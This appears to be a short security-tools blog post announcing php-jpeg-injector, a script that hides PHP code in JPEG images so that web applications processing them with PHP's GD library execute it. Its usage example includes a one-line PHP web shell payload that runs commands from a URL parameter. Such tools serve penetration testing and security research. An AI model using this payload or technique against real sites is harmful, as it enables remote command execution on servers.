php-jpeg-injector: Injects php payloads into jpeg images

by do son · Published · Updated

php-jpeg-injector

php-jpeg-injector

Injects php payloads into jpeg images. Related to this post.

Use Case

You have a web application that runs a jpeg image through PHP’s GD graphics library.

Description

This script injects PHP code into a specified jpeg image. The web application will execute the payload if it interprets the image. Make sure your input jpeg is uncompressed!

How it works

PHP code is injected in the null/garbage (brown) space after the scan header:

 

The newly infected jpeg is run through PHP’s gd-library. PHP interprets the payload injected in the jpeg and executes it.

Download

git clone https://github.com/dlegs/php-jpeg-injector.git

Use

python3 gd-jpeg.py [JPEG] [PAYLOAD] [OUTPUT_JPEG]

e.g. python3 gd-jpeg.py cat.jpeg ‘<?php system($_GET[“cmd”]);?>’ infected_cat.jpeg

Source: https://github.com/dlegs/

Tags: php-jpeg-injector